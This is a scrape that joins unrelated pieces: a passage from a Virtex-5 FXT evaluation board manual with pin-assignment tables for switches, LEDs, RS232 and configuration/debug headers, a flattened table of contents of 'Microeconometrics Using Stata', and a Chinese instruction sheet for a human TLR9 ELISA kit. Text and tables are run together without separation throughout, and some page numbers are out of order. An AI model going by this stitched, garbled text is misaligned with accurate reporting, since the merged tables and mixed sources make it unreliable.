jumper settings for the RS232 interface.Net Name Description Virtex-5 PinRS232_RXD Received Data, RD K8Data,TD L8RS232_TXD TransmitRS232_RTS Request To Send, RTS N8RS232_CTS Clear To Send, CTS R8Table 12 - RS232 Signals2.5 UserSwitchesFour momentary closure push buttons have been installed on the board and connected to the FPGA. These buttons can be programmed by the user and are ideal for logic reset and similar functions. Pull down resistors hold the signals low until the switch closure pulls it high (active high signals).Net Name Reference Virtex-5 PinSWITCH_PB1 SW1 AF20SWITCH_PB2 SW2 AE20SWITCH_PB3 SW3 AD19SWITCH_PB4 SW4 AD20Table 13 - Push-Button Pin AssignmentsAn eight-position dipswitch (SPST) has been installed on the board and connected to the FPGA. These switches provide digital inputs to user logic as needed. The signals are pulled low by 1K ohm resistors when the switch is open and tied high to 1.8V when flipped to the ON position.Net Name Reference Virtex-5 PinSWITCH0 SW5 – 0 AD13SWITCH1 SW5 – 1 AE13SWITCH2 SW5 – 2 AF13SWITCH3 SW5 – 3 AD15SWITCH4 SW5 – 4 AD14SWITCH5 SW5 – 5 AF14SWITCH6 SW5 – 6 AE15SWITCH7 SW5 – 7 AF15Table 14 - DIP Switch Pin Assignments2.6 UserLEDsEight discrete LEDs are installed on the board and can be used to display the status of the internal logic. These LEDs are attached as shown below and are lit by forcing the associated FPGA I/O pin to a logic ‘0’ or low and are off when the pin is logic level ‘1’ or high.Net Name Reference Virtex-5 Pin#LED0 D6 AF22LED1 D7 AF23LED2 D8 AF25LED3 D9 AE25LED4 D10 AD25LED5 D11 AE26LED6 D12 AD26LED7 D13 AC26Table 15 - LED Pin Assignments2.7 Configuration and Debug Ports2.7.1 ConfigurationModesThe Virtex-5 FXT Evaluation Board supports three methods of configuring the FPGA. The possible configuration methods include Boundary-scan (JTAG cable), BPI Flash, and the System ACE Module (SAM) header. The Virtex-5 device also supports configuration from BPI Flash. The blue LED labeled “DONE” on the board illuminates to indicate when the FPGA has been successfully configured.JP5 is the mode jumper that is used to tell the FPGA to configure in JTAG mode or Flash BPI mode. In JTAG mode a Xilinx parallel JTAG cable must be used (PC4 or USB). When the jumper is set for BPI mode, the flash must be programmed with a BPI-UP image in order for the FPGA to successfully configure. For configuration from a System ACE Module, the JTAG setting must be used.The Virtex-5 FXT Evaluation Board come pre-programmed with the factory test image in the BPI flash. The table below shows the correct jumper configuration for each configuration mode.ConfigurationModeJP5 PositionJTAG 2-3 System ACE 2-3BPI-UP * 1-2Table 16 - FPGA Configuration Modes*Default assembled state2.7.2 System ACE™ Module ConnectorThe Virtex-5 FXT Evaluation Board provides support for the Avnet System ACE Module (SAM) via the 50-pin connector labeled “JP6” on the board. The SAM can be used to configure the FPGA or to provide bulk Flash to the processor. This interface gives software designers the ability to run real-time operating systems (RTOS) from removable CompactFlash cards. The Avnet System ACE module (DS-KIT-SYSTEMACE) is sold separately. The figure below shows the System ACE Module connected to the header on the Virtex-5 FXT Evaluation Board.JTAG Configuration PortMPUInterfaceReset &ClockPower &GroundMiscSignals Figure 9 - SAM Interface (50-pin header)The following table shows the System ACE ports that are accessible over the SAM header. The majority of the pins on this header may be used as general purpose I/O when not using a System ACE Module. The Virtex-5 pin numbers are provided for these general purpose pins.Virtex-5 PinSystem ACE Signal Name SAM Connector Pin # (JP11) System ACESignal NameVirtex-5 Pin- 3.3V 1 2 3.3V - - JTAG_TDO 3 4 GND - - JTAG_TMS 5 6 SAM_CLK F12 - JTAG_TDI7 8 GND - - FPGA_PROG# 9 10 JTAG_TCK - - GND 11 12 GND - Y6 SAM_OE# 13 14 FPGA_INIT# - Y5 SAM_A0 15 16 SAM_WE# Y4 W6 SAM_A2 17 18 SAM_A1 V7 - 2.5V 19 20 SAM_A3 W5 F5 SAM_D0 21 22 2.5V - V6 SAM_D2 23 24 SAM_D1 U7 U6 SAM_D4 25 26 SAM_D3 U5 T7 SAM_D6 27 28 SAM_D5 T5 R7 SAM_D8 29 30 SAM_D7 R6 P6 SAM_D10 31 32 SAM_D9 R5 N6 SAM_D12 33 34 SAM_D11 P8 K5 SAM_D14 35 36 SAM_D13 M7 K6 SAM_A4 37 38 SAM_D15 L7 J6 SAM_A6 39 40 SAM_A5 J5 H4 SAM_IRQ 41 42 GND - H6 SAM_RESET# 43 44 SAM_CE# G4 - FPGA_DONE 45 46 SAM_BRDY G5 - FPGA_CCLK 47 48 FPGA_D_IN - - GND 49 50 GND -Table 17 - SAM Interface Signals2.7.3JTAG Port (PC4)The Virtex-5 FXT Evaluation Board provides a JTAG port (PC4 type) connector (J9) for configuration of the FPGA. The following figure shows the pin assignments for the PC4 header on this development board.Figure 10 - PC4 JTAG Port Connector2.7.4 CPU Debug PortThe Virtex-5 FXT Evaluation Board provides a CPU Debug header for connection of a debug probe to the integrated PowerPC processor.CPU Debug connector JP4 can be used to download code into the Virtex-5 FXT integrated PowerPC processor. The JTAG port can also be used as the processor debug port. The FPGA general-purpose I/O pins are used for this interface. The following figure shows the CPU Debug Connector.Figure 11 - CPU Debug Connector2.7.5 CPU Trace PortThe Virtex-5 FXT Evaluation Board provides a CPU Trace header for connection of a trace probe to the integrated PowerPC processor. The FPGA general-purpose I/O pins are used for this interface.The processor uses the trace interface when operating in real-time trace-debug mode. Real-time trace-debug mode supports real-time tracing of the instruction stream executed by the processor. In this mode, debug events are used to cause external trigger events. An external trace tool uses the trigger events to control the collection of trace information. The broadcast of trace information on the trace interface occurs independently of external trigger events (trace information is always supplied by the processor). Real-time trace-debug does not affect processor performance. The following figure shows the CPU Trace connector on the Virtex-5 FXT Evaluation Board.NC NC NCNC Mictor_5NCNCNC NCCPU_HALTCPU_TDOCPU_TCK CPU_TMS CPU_TDI CPU_TRST Mictor_23Mictor_25Mictor_27Mictor_29Mictor_31Mictor_33Mictor_35Mictor_37Mictor_16Mictor_18Mictor_20Mictor_22TRACE.TS10TRACE.TS20TRACE.TS1E NCVref (pullup )TRACE.CLK TRACE.TS2E TRACE.TS3TRACE.TS4TRACE.TS5TRACE.TS6Mictor ConnectorFigure 12 - CPU Trace Connector。

Microeconometrics using stata

Microeconometrics using stata

Microeconometrics Using StataContentsList of tables xxxv List of figures xxxvii Preface xxxix 1Stata basics1............................................................................................1.1Interactive use 1..............................................................................................1.2 Documentation 2..........................................................................1.2.1Stata manuals 2...........................................................1.2.2Additional Stata resources 3.......................................................................1.2.3The help command 3................................1.2.4The search, findit, and hsearch commands 41.3 Command syntax and operators 5...................................................................................................................................1.3.1Basic command syntax 5................................................1.3.2 Example: The summarize command 61.3.3Example: The regress command 7..............................................................................1.3.4Abbreviations, case sensitivity, and wildcards 9................................1.3.5Arithmetic, relational, and logical operators 9.........................................................................1.3.6Error messages 10........................................................................................1.4 Do-files and log files 10.............................................................................1.4.1Writing a do-file 101.4.2Running do-files 11.........................................................................................................................................................................1.4.3Log files 12..................................................................1.4.4 A three-step process 131.4.5Comments and long lines 13......................................................................................................1.4.6Different implementations of Stata 141.5Scalars and matrices (15)1.5.1Scalars (15)1.5.2Matrices (15)1.6 Using results from Stata commands (16)1.6.1Using results from the r-class command summarize (16)1.6.2Using results from the e-class command regress (17)1.7 Global and local macros (19)1.7.1Global macros (19)1.7.2Local macros (20)1.7.3Scalar or macro? (21)1.8 Looping commands (22)1.8.1The foreach loop (23)1.8.2The forvalues loop (23)1.8.3The while loop (24)1.8.4The continue command (24)1.9 Some useful commands (24)1.10 Template do-file (25)1.11 User-written commands (25)1.12 Stata resources (26)1.13 Exercises (26)2 Data management and graphics292.1Introduction (29)2.2 Types of data (29)2.2.1Text or ASCII data (30)2.2.2Internal numeric data (30)2.2.3String data (31)2.2.4Formats for displaying numeric data (31)2.3Inputting data (32)2.3.1General principles (32)2.3.2Inputting data already in Stata format (33)2.3.3Inputting data from the keyboard (34)2.3.4Inputting nontext data (34)2.3.5Inputting text data from a spreadsheet (35)2.3.6Inputting text data in free format (36)2.3.7Inputting text data in fixed format (36)2.3.8Dictionary files (37)2.3.9Common pitfalls (37)2.4 Data management (38)2.4.1PSID example (38)2.4.2Naming and labeling variables (41)2.4.3Viewing data (42)2.4.4Using original documentation (43)2.4.5Missing values (43)2.4.6Imputing missing data (45)2.4.7Transforming data (generate, replace, egen, recode) (45)The generate and replace commands (46)The egen command (46)The recode command (47)The by prefix (47)Indicator variables (47)Set of indicator variables (48)Interactions (49)Demeaning (50)2.4.8Saving data (51)2.4.9Selecting the sample (51)2.5 Manipulating datasets (53)2.5.1Ordering observations and variables (53)2.5.2Preserving and restoring a dataset (53)2.5.3Wide and long forms for a dataset (54)2.5.4Merging datasets (54)2.5.5Appending datasets (56)2.6 Graphical display of data (57)2.6.1Stata graph commands (57)Example graph commands (57)Saving and exporting graphs (58)Learning how to use graph commands (59)2.6.2Box-and-whisker plot (60)2.6.3Histogram (61)2.6.4Kernel density plot (62)2.6.5Twoway scatterplots and fitted lines (64)2.6.6Lowess, kernel, local linear, and nearest-neighbor regression652.6.7Multiple scatterplots (67)2.7 Stata resources (68)2.8Exercises (68)3Linear regression basics713.1Introduction (71)3.2 Data and data summary (71)3.2.1Data description (71)3.2.2Variable description (72)3.2.3Summary statistics (73)3.2.4More-detailed summary statistics (74)3.2.5Tables for data (75)3.2.6Statistical tests (78)3.2.7Data plots (78)3.3Regression in levels and logs (79)3.3.1Basic regression theory (79)3.3.2OLS regression and matrix algebra (80)3.3.3Properties of the OLS estimator (81)3.3.4Heteroskedasticity-robust standard errors (82)3.3.5Cluster–robust standard errors (82)3.3.6Regression in logs (83)3.4Basic regression analysis (84)3.4.1Correlations (84)3.4.2The regress command (85)3.4.3Hypothesis tests (86)3.4.4Tables of output from several regressions (87)3.4.5Even better tables of regression output (88)3.5Specification analysis (90)3.5.1Specification tests and model diagnostics (90)3.5.2Residual diagnostic plots (91)3.5.3Influential observations (92)3.5.4Specification tests (93)Test of omitted variables (93)Test of the Box–Cox model (94)Test of the functional form of the conditional mean (95)Heteroskedasticity test (96)Omnibus test (97)3.5.5Tests have power in more than one direction (98)3.6Prediction (100)3.6.1In-sample prediction (100)3.6.2Marginal effects (102)3.6.3Prediction in logs: The retransformation problem (103)3.6.4Prediction exercise (104)3.7 Sampling weights (105)3.7.1Weights (106)3.7.2Weighted mean (106)3.7.3Weighted regression (107)3.7.4Weighted prediction and MEs (109)3.8 OLS using Mata (109)3.9Stata resources (111)3.10 Exercises (111)4Simulation1134.1Introduction (113)4.2 Pseudorandom-number generators: Introduction (114)4.2.1Uniform random-number generation (114)4.2.2Draws from normal (116)4.2.3Draws from t, chi-squared, F, gamma, and beta (117)4.2.4 Draws from binomial, Poisson, and negative binomial . . . (118)Independent (but not identically distributed) draws frombinomial (118)Independent (but not identically distributed) draws fromPoisson (119)Histograms and density plots (120)4.3 Distribution of the sample mean (121)4.3.1Stata program (122)4.3.2The simulate command (123)4.3.3Central limit theorem simulation (123)4.3.4The postfile command (124)4.3.5Alternative central limit theorem simulation (125)4.4 Pseudorandom-number generators: Further details (125)4.4.1Inverse-probability transformation (126)4.4.2Direct transformation (127)4.4.3Other methods (127)4.4.4Draws from truncated normal (128)4.4.5Draws from multivariate normal (129)Direct draws from multivariate normal (129)Transformation using Cholesky decomposition (130)4.4.6Draws using Markov chain Monte Carlo method (130)4.5 Computing integrals (132)4.5.1Quadrature (133)4.5.2Monte Carlo integration (133)4.5.3Monte Carlo integration using different S (134)4.6Simulation for regression: Introduction (135)4.6.1Simulation example: OLS with X2 errors (135)4.6.2Interpreting simulation output (138)Unbiasedness of estimator (138)Standard errors (138)t statistic (138)Test size (139)Number of simulations (140)4.6.3Variations (140)Different sample size and number of simulations (140)Test power (140)Different error distributions (141)4.6.4Estimator inconsistency (141)4.6.5Simulation with endogenous regressors (142)4.7Stata resources (144)4.8Exercises (144)5GLS regression1475.1Introduction (147)5.2 GLS and FGLS regression (147)5.2.1GLS for heteroskedastic errors (147)5.2.2GLS and FGLS (148)5.2.3Weighted least squares and robust standard errors (149)5.2.4Leading examples (149)5.3 Modeling heteroskedastic data (150)5.3.1Simulated dataset (150)5.3.2OLS estimation (151)5.3.3Detecting heteroskedasticity (152)5.3.4FGLS estimation (154)5.3.5WLS estimation (156)5.4System of linear regressions (156)5.4.1SUR model (156)5.4.2The sureg command (157)5.4.3Application to two categories of expenditures (158)5.4.4Robust standard errors (160)5.4.5Testing cross-equation constraints (161)5.4.6Imposing cross-equation constraints (162)5.5Survey data: Weighting, clustering, and stratification (163)5.5.1Survey design (164)5.5.2Survey mean estimation (167)5.5.3Survey linear regression (167)5.6Stata resources (169)5.7Exercises (169)6Linear instrumental-variables regression1716.1Introduction (171)6.2 IV estimation (171)6.2.1Basic IV theory (171)6.2.2Model setup (173)6.2.3IV estimators: IV, 2SLS, and GMM (174)6.2.4Instrument validity and relevance (175)6.2.5Robust standard-error estimates (176)6.3 IV example (177)6.3.1The ivregress command (177)6.3.2Medical expenditures with one endogenous regressor . . . (178)6.3.3Available instruments (179)6.3.4IV estimation of an exactly identified model (180)6.3.5IV estimation of an overidentified model (181)6.3.6Testing for regressor endogeneity (182)6.3.7Tests of overidentifying restrictions (185)6.3.8IV estimation with a binary endogenous regressor (186)6.4 Weak instruments (188)6.4.1Finite-sample properties of IV estimators (188)6.4.2Weak instruments (189)Diagnostics for weak instruments (189)Formal tests for weak instruments (190)6.4.3The estat firststage command (191)6.4.4Just-identified model (191)6.4.5Overidentified model (193)6.4.6More than one endogenous regressor (195)6.4.7Sensitivity to choice of instruments (195)6.5 Better inference with weak instruments (197)6.5.1Conditional tests and confidence intervals (197)6.5.2LIML estimator (199)6.5.3Jackknife IV estimator (199)6.5.4 Comparison of 2SLS, LIML, JIVE, and GMM (200)6.6 3SLS systems estimation (201)6.7Stata resources (203)6.8Exercises (203)7Quantile regression2057.1Introduction (205)7.2 QR (205)7.2.1Conditional quantiles (206)7.2.2Computation of QR estimates and standard errors (207)7.2.3The qreg, bsqreg, and sqreg commands (207)7.3 QR for medical expenditures data (208)7.3.1Data summary (208)7.3.2QR estimates (209)7.3.3Interpretation of conditional quantile coefficients (210)7.3.4Retransformation (211)7.3.5Comparison of estimates at different quantiles (212)7.3.6Heteroskedasticity test (213)7.3.7Hypothesis tests (214)7.3.8Graphical display of coefficients over quantiles (215)7.4 QR for generated heteroskedastic data (216)7.4.1Simulated dataset (216)7.4.2QR estimates (219)7.5 QR for count data (220)7.5.1Quantile count regression (221)7.5.2The qcount command (222)7.5.3Summary of doctor visits data (222)7.5.4Results from QCR (224)7.6Stata resources (226)7.7Exercises (226)8Linear panel-data models: Basics2298.1Introduction (229)8.2 Panel-data methods overview (229)8.2.1Some basic considerations (230)8.2.2Some basic panel models (231)Individual-effects model (231)Fixed-effects model (231)Random-effects model (232)Pooled model or population-averaged model (232)Two-way-effects model (232)Mixed linear models (233)8.2.3Cluster-robust inference (233)8.2.4The xtreg command (233)8.2.5Stata linear panel-data commands (234)8.3 Panel-data summary (234)8.3.1Data description and summary statistics (234)8.3.2Panel-data organization (236)8.3.3Panel-data description (237)8.3.4Within and between variation (238)8.3.5Time-series plots for each individual (241)8.3.6Overall scatterplot (242)8.3.7Within scatterplot (243)8.3.8Pooled OLS regression with cluster—robust standard errors ..2448.3.9Time-series autocorrelations for panel data (245)8.3.10 Error correlation in the RE model (247)8.4 Pooled or population-averaged estimators (248)8.4.1Pooled OLS estimator (248)8.4.2Pooled FGLS estimator or population-averaged estimator (248)8.4.3The xtreg, pa command (249)8.4.4Application of the xtreg, pa command (250)8.5 Within estimator (251)8.5.1Within estimator (251)8.5.2The xtreg, fe command (251)8.5.3Application of the xtreg, fe command (252)8.5.4Least-squares dummy-variables regression (253)8.6 Between estimator (254)8.6.1Between estimator (254)8.6.2Application of the xtreg, be command (255)8.7 RE estimator (255)8.7.1RE estimator (255)8.7.2The xtreg, re command (256)8.7.3Application of the xtreg, re command (256)8.8 Comparison of estimators (257)8.8.1Estimates of variance components (257)8.8.2Within and between R-squared (258)8.8.3Estimator comparison (258)8.8.4Fixed effects versus random effects (259)8.8.5Hausman test for fixed effects (260)The hausman command (260)Robust Hausman test (261)8.8.6Prediction (262)8.9 First-difference estimator (263)8.9.1First-difference estimator (263)8.9.2Strict and weak exogeneity (264)8.10 Long panels (265)8.10.1 Long-panel dataset (265)8.10.2 Pooled OLS and PFGLS (266)8.10.3 The xtpcse and xtgls commands (267)8.10.4 Application of the xtgls, xtpcse, and xtscc commands . . . (268)8.10.5 Separate regressions (270)8.10.6 FE and RE models (271)8.10.7 Unit roots and cointegration (272)8.11 Panel-data management (274)8.11.1 Wide-form data (274)8.11.2 Convert wide form to long form (274)8.11.3 Convert long form to wide form (275)8.11.4 An alternative wide-form data (276)8.12 Stata resources (278)8.13 Exercises (278)9Linear panel-data models: Extensions2819.1Introduction (281)9.2 Panel IV estimation (281)9.2.1Panel IV (281)9.2.2The xtivreg command (282)9.2.3Application of the xtivreg command (282)9.2.4Panel IV extensions (284)9.3 Hausman-Taylor estimator (284)9.3.1Hausman-Taylor estimator (284)9.3.2The xthtaylor command (285)9.3.3Application of the xthtaylor command (285)9.4 Arellano-Bond estimator (287)9.4.1Dynamic model (287)9.4.2IV estimation in the FD model (288)9.4.3 The xtabond command (289)9.4.4Arellano-Bond estimator: Pure time series (290)9.4.5Arellano-Bond estimator: Additional regressors (292)9.4.6Specification tests (294)9.4.7 The xtdpdsys command (295)9.4.8 The xtdpd command (297)9.5 Mixed linear models (298)9.5.1Mixed linear model (298)9.5.2 The xtmixed command (299)9.5.3Random-intercept model (300)9.5.4Cluster-robust standard errors (301)9.5.5Random-slopes model (302)9.5.6Random-coefficients model (303)9.5.7Two-way random-effects model (304)9.6 Clustered data (306)9.6.1Clustered dataset (306)9.6.2Clustered data using nonpanel commands (306)9.6.3Clustered data using panel commands (307)9.6.4Hierarchical linear models (310)9.7Stata resources (311)9.8Exercises (311)10 Nonlinear regression methods31310.1 Introduction (313)10.2 Nonlinear example: Doctor visits (314)10.2.1 Data description (314)10.2.2 Poisson model description (315)10.3 Nonlinear regression methods (316)10.3.1 MLE (316)10.3.2 The poisson command (317)10.3.3 Postestimation commands (318)10.3.4 NLS (319)10.3.5 The nl command (319)10.3.6 GLM (321)10.3.7 The glm command (321)10.3.8 Other estimators (322)10.4 Different estimates of the VCE (323)10.4.1 General framework (323)10.4.2 The vce() option (324)10.4.3 Application of the vce() option (324)10.4.4 Default estimate of the VCE (326)10.4.5 Robust estimate of the VCE (326)10.4.6 Cluster–robust estimate of the VCE (327)10.4.7 Heteroskedasticity- and autocorrelation-consistent estimateof the VCE (328)10.4.8 Bootstrap standard errors (328)10.4.9 Statistical inference (329)10.5 Prediction (329)10.5.1 The predict and predictnl commands (329)10.5.2 Application of predict and predictnl (330)10.5.3 Out-of-sample prediction (331)10.5.4 Prediction at a specified value of one of the regressors (321)10.5.5 Prediction at a specified value of all the regressors (332)10.5.6 Prediction of other quantities (333)10.6 Marginal effects (333)10.6.1 Calculus and finite-difference methods (334)10.6.2 MEs estimates AME, MEM, and MER (334)10.6.3 Elasticities and semielasticities (335)10.6.4 Simple interpretations of coefficients in single-index models (336)10.6.5 The mfx command (337)10.6.6 MEM: Marginal effect at mean (337)Comparison of calculus and finite-difference methods . . . (338)10.6.7 MER: Marginal effect at representative value (338)10.6.8 AME: Average marginal effect (339)10.6.9 Elasticities and semielasticities (340)10.6.10 AME computed manually (342)10.6.11 Polynomial regressors (343)10.6.12 Interacted regressors (344)10.6.13 Complex interactions and nonlinearities (344)10.7 Model diagnostics (345)10.7.1 Goodness-of-fit measures (345)10.7.2 Information criteria for model comparison (346)10.7.3 Residuals (347)10.7.4 Model-specification tests (348)10.8 Stata resources (349)10.9 Exercises (349)11 Nonlinear optimization methods35111.1 Introduction (351)11.2 Newton–Raphson method (351)11.2.1 NR method (351)11.2.2 NR method for Poisson (352)11.2.3 Poisson NR example using Mata (353)Core Mata code for Poisson NR iterations (353)Complete Stata and Mata code for Poisson NR iterations (353)11.3 Gradient methods (355)11.3.1 Maximization options (355)11.3.2 Gradient methods (356)11.3.3 Messages during iterations (357)11.3.4 Stopping criteria (357)11.3.5 Multiple maximums (357)11.3.6 Numerical derivatives (358)11.4 The ml command: if method (359)11.4.1 The ml command (360)11.4.2 The If method (360)11.4.3 Poisson example: Single-index model (361)11.4.4 Negative binomial example: Two-index model (362)11.4.5 NLS example: Nonlikelihood model (363)11.5 Checking the program (364)11.5.1 Program debugging using ml check and ml trace (365)11.5.2 Getting the program to run (366)11.5.3 Checking the data (366)11.5.4 Multicollinearity and near coilinearity (367)11.5.5 Multiple optimums (368)11.5.6 Checking parameter estimation (369)11.5.7 Checking standard-error estimation (370)11.6 The ml command: d0, dl, and d2 methods (371)11.6.1 Evaluator functions (371)11.6.2 The d0 method (373)11.6.3 The dl method (374)11.6.4 The dl method with the robust estimate of the VCE (374)11.6.5 The d2 method (375)11.7 The Mata optimize() function (376)11.7.1 Type d and v evaluators (376)11.7.2 Optimize functions (377)11.7.3 Poisson example (377)Evaluator program for Poisson MLE (377)The optimize() function for Poisson MLE (378)11.8 Generalized method of moments (379)11.8.1 Definition (380)11.8.2 Nonlinear IV example (380)11.8.3 GMM using the Mata optimize() function (381)11.9 Stata resources (383)11.10 Exercises (383)12 Testing methods38512.1 Introduction (385)12.2 Critical values and p-values (385)12.2.1 Standard normal compared with Student's t (386)12.2.2 Chi-squared compared with F (386)12.2.3 Plotting densities (386)12.2.4 Computing p-values and critical values (388)12.2.5 Which distributions does Stata use? (389)12.3 Wald tests and confidence intervals (389)12.3.1 Wald test of linear hypotheses (389)12.3.2 The test command (391)Test single coefficient (392)Test several hypotheses (392)Test of overall significance (393)Test calculated from retrieved coefficients and VCE (393)12.3.3 One-sided Wald tests (394)12.3.4 Wald test of nonlinear hypotheses (delta method) (395)12.3.5 The testnl command (395)12.3.6 Wald confidence intervals (396)12.3.7 The lincom command (396)12.3.8 The nlcom command (delta method) (397)12.3.9 Asymmetric confidence intervals (398)12.4 Likelihood-ratio tests (399)12.4.1 Likelihood-ratio tests (399)12.4.2 The lrtest command (401)12.4.3 Direct computation of LR tests (401)12.5 Lagrange multiplier test (or score test) (402)12.5.1 LM tests (402)12.5.2 The estat command (403)12.5.3 LM test by auxiliary regression (403)12.6 Test size and power (405)12.6.1 Simulation DGP: OLS with chi-squared errors (405)12.6.2 Test size (406)12.6.3 Test power (407)12.6.4 Asymptotic test power (410)12.7 Specification tests (411)12.7.1 Moment-based tests (411)12.7.2 Information matrix test (411)12.7.3 Chi-squared goodness-of-fit test (412)12.7.4 Overidentifying restrictions test (412)12.7.5 Hausman test (412)12.7.6 Other tests (413)12.8 Stata resources (413)12.9 Exercises (413)13 Bootstrap methods41513.1 Introduction (415)13.2 Bootstrap methods (415)13.2.1 Bootstrap estimate of standard error (415)13.2.2 Bootstrap methods (416)13.2.3 Asymptotic refinement (416)13.2.4 Use the bootstrap with caution (416)13.3 Bootstrap pairs using the vce(bootstrap) option (417)13.3.1 Bootstrap-pairs method to estimate VCE (417)13.3.2 The vce(bootstrap) option (418)13.3.3 Bootstrap standard-errors example (418)13.3.4 How many bootstraps? (419)13.3.5 Clustered bootstraps (420)13.3.6 Bootstrap confidence intervals (421)13.3.7 The postestimation estat bootstrap command (422)13.3.8 Bootstrap confidence-intervals example (423)13.3.9 Bootstrap estimate of bias (423)13.4 Bootstrap pairs using the bootstrap command (424)13.4.1 The bootstrap command (424)13.4.2 Bootstrap parameter estimate from a Stata estimationcommand (425)13.4.3 Bootstrap standard error from a Stata estimation command (426)13.4.4 Bootstrap standard error from a user-written estimationcommand (426)13.4.5 Bootstrap two-step estimator (427)13.4.6 Bootstrap Hausman test (429)13.4.7 Bootstrap standard error of the coefficient of variation . . (430)13.5 Bootstraps with asymptotic refinement (431)13.5.1 Percentile-t method (431)13.5.2 Percentile-t Wald test (432)13.5.3 Percentile-t Wald confidence interval (433)13.6 Bootstrap pairs using bsample and simulate (434)13.6.1 The bsample command (434)13.6.2 The bsample command with simulate (434)13.6.3 Bootstrap Monte Carlo exercise (436)13.7 Alternative resampling schemes (436)13.7.1 Bootstrap pairs (437)13.7.2 Parametric bootstrap (437)13.7.3 Residual bootstrap (439)13.7.4 Wild bootstrap (440)13.7.5 Subsampling (441)13.8 The jackknife (441)13.8.1 Jackknife method (441)13.8.2 The vice(jackknife) option and the jackknife command . . (442)13.9 Stata resources (442)13.10 Exercises (442)14 Binary outcome models44514.1 Introduction (445)14.2 Some parametric models (445)14.2.1 Basic model (445)14.2.2 Logit, probit, linear probability, and clog-log models . . . (446)14.3 Estimation (446)14.3.1 Latent-variable interpretation and identification (447)14.3.2 ML estimation (447)14.3.3 The logit and probit commands (448)14.3.4 Robust estimate of the VCE (448)14.3.5 OLS estimation of LPM (448)14.4 Example (449)14.4.1 Data description (449)14.4.2 Logit regression (450)14.4.3 Comparison of binary models and parameter estimates . (451)14.5 Hypothesis and specification tests (452)14.5.1 Wald tests (453)14.5.2 Likelihood-ratio tests (453)14.5.3 Additional model-specification tests (454)Lagrange multiplier test of generalized logit (454)Heteroskedastic probit regression (455)14.5.4 Model comparison (456)14.6 Goodness of fit and prediction (457)14.6.1 Pseudo-R2 measure (457)14.6.2 Comparing predicted probabilities with sample frequencies (457)14.6.3 Comparing predicted outcomes with actual outcomes . . . (459)14.6.4 The predict command for fitted probabilities (460)14.6.5 The prvalue command for fitted probabilities (461)14.7 Marginal effects (462)14.7.1 Marginal effect at a representative value (MER) (462)14.7.2 Marginal effect at the mean (MEM) (463)14.7.3 Average marginal effect (AME) (464)14.7.4 The prchange command (464)14.8 Endogenous regressors (465)14.8.1 Example (465)14.8.2 Model assumptions (466)14.8.3 Structural-model approach (467)The ivprobit command (467)Maximum likelihood estimates (468)Two-step sequential estimates (469)14.8.4 IVs approach (471)14.9 Grouped data (472)14.9.1 Estimation with aggregate data (473)14.9.2 Grouped-data application (473)14.10 Stata resources (475)14.11 Exercises (475)15 Multinomial models47715.1 Introduction (477)15.2 Multinomial models overview (477)15.2.1 Probabilities and MEs (477)15.2.2 Maximum likelihood estimation (478)15.2.3 Case-specific and alternative-specific regressors (479)15.2.4 Additive random-utility model (479)15.2.5 Stata multinomial model commands (480)15.3 Multinomial example: Choice of fishing mode (480)15.3.1 Data description (480)15.3.2 Case-specific regressors (483)15.3.3 Alternative-specific regressors (483)15.4 Multinomial logit model (484)15.4.1 The mlogit command (484)15.4.2 Application of the mlogit command (485)15.4.3 Coefficient interpretation (486)15.4.4 Predicted probabilities (487)15.4.5 MEs (488)15.5 Conditional logit model (489)15.5.1 Creating long-form data from wide-form data (489)15.5.2 The asclogit command (491)15.5.3 The clogit command (491)15.5.4 Application of the asclogit command (492)15.5.5 Relationship to multinomial logit model (493)15.5.6 Coefficient interpretation (493)15.5.7 Predicted probabilities (494)15.5.8 MEs (494)15.6 Nested logit model (496)15.6.1 Relaxing the independence of irrelevant alternatives as-sumption (497)15.6.2 NL model (497)15.6.3 The nlogit command (498)15.6.4 Model estimates (499)15.6.5 Predicted probabilities (501)15.6.6 MEs (501)15.6.7 Comparison of logit models (502)15.7 Multinomial probit model (503)15.7.1 MNP (503)15.7.2 The mprobit command (503)15.7.3 Maximum simulated likelihood (504)15.7.4 The asmprobit command (505)15.7.5 Application of the asmprobit command (505)15.7.6 Predicted probabilities and MEs (507)15.8 Random-parameters logit (508)15.8.1 Random-parameters logit (508)15.8.2 The mixlogit command (508)15.8.3 Data preparation for mixlogit (509)15.8.4 Application of the mixlogit command (509)15.9 Ordered outcome models (510)15.9.1 Data summary (511)15.9.2 Ordered outcomes (512)15.9.3 Application of the ologit command (512)15.9.4 Predicted probabilities (513)15.9.5 MEs (513)15.9.6 Other ordered models (514)15.10 Multivariate outcomes (514)15.10.1 Bivariate probit (515)15.10.2 Nonlinear SUR (517)15.11 Stata resources (518)15.12 Exercises (518)16 Tobit and selection models52116.1 Introduction (521)16.2 Tobit model (521)16.2.1 Regression with censored data (521)16.2.2 Tobit model setup (522)16.2.3 Unknown censoring point (523)。

试剂盒使用说明书

试剂盒使用说明书

人Toll样受体9(TLR9)ELISA试剂盒使用说明书本试剂盒仅供研究使用预期应用ELISA法定量测定人血清、血浆、细胞培养物上清或其它相关液体中TLR9含量。

实验原理本试剂盒应用双抗体夹心酶标免疫分析法测定标本中TLR9水平。

用纯化的抗体包被微孔板,制成固相抗体,往包被单抗的微孔中依次加入TLR9抗原、生物素化的抗人TLR9抗体、HRP标记的亲和素,经过彻底洗涤后用底物TMB显色。

TMB在过氧化物酶的催化下转化成蓝色,并在酸的作用下转化成最终的黄色。

颜色的深浅和样品中的TLR9呈正相关。

用酶标仪在450nm波长下测定吸光度(OD值),计算样品浓度。

试剂盒组成及试剂配制1.酶联板:一块(96孔)2.标准品(冻干品):2瓶,每瓶临用前以样品稀释液稀释至1ml,盖好后静置10分钟以上,然后反复颠倒/搓动以助溶解,其浓度为10000pg/mL,做系列倍比稀释后,分别稀释成10000pg/mL,5000pg/mL,2500pg/mL,1250pg/mL,625pg/mL,312.5pg/mL,156pg/mL,其原液直接作为最高标准浓度,样品稀释液直接作为标准浓度0pg/mL,临用前15分钟内配制。

如配制5000pg/mL标准品:取0.5ml10000pg/mL的上述标准品加入含有0.5ml样品稀释液的Eppendorf管中,混匀即可,其余浓度以此类推。

3.样品稀释液:1×20ml/瓶。

4.检测稀释液A:1×10ml/瓶。

5.检测稀释液B:1×10ml/瓶。

6.检测溶液A:1×120ul/瓶(1:100)临用前以检测稀释液A1:100稀释,稀释前根据预先计算好的每次实验所需的总量配制(每孔100ul),实际配制时应多配制0.1-0.2ml。

如1ul检测溶液A加99ul检测稀释液A的比例配制,轻轻混匀,在使用前一小时内配制。

7.检测溶液B:1×120ul/瓶(1:100)临用前以检测稀释液B1:100稀释。

分子生物学实验理论与操作教程

分子生物学实验理论与操作教程

